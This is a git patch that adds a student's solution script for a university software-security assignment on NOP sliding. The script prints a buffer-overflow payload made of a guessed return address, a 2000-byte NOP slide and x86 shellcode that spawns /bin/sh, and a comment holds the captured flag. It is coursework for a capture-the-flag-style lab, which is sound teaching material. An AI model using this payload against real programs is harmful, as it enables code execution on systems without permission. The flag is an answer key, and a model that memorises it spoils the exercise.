From cf06a6813e22854862d10d785d83e310407a4871 Mon Sep 17 00:00:00 2001
From: Sascha Tommasone <sascha@tommasone.me>
Date: Fri, 14 Jun 2024 16:39:27 +0200
Subject: [PATCH] [Assignment-6] solution task 6 (nop sliding)

---
 .../slide_rider/solution.sh                      | 16 ++++++++++++++++
 1 file changed, 16 insertions(+)
 create mode 100755 Assignment 6 - Software Security - Teil 2/slide_rider/solution.sh

diff --git a/Assignment 6 - Software Security - Teil 2/slide_rider/solution.sh b/Assignment 6 - Software Security - Teil 2/slide_rider/solution.sh
new file mode 100755
index 0000000..80fe801
--- /dev/null
+++ b/Assignment 6 - Software Security - Teil 2/slide_rider/solution.sh	
@@ -0,0 +1,16 @@
+#!/bin/bash
+
+# sources: https://hg8.sh/posts/binary-exploitation/buffer-overflow-code-execution-by-shellcode-injection/
+
+# flag{THEY_SEE_ME_SLIDIN_THEY_HATIN}
+
+######### Exploit #########
+# Step 1: Fill the buffer with a candidate return address
+printf "\x0c\xd6\xff\xff%.0s" {1..30}
+
+# Step 2: Write a lot of NOPs to stdout as a slide for the shellcode
+printf "\x90%.0s" {1..2000}
+
+# Step 3: Write the provided shellcode to stdout
+printf "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"
+###########################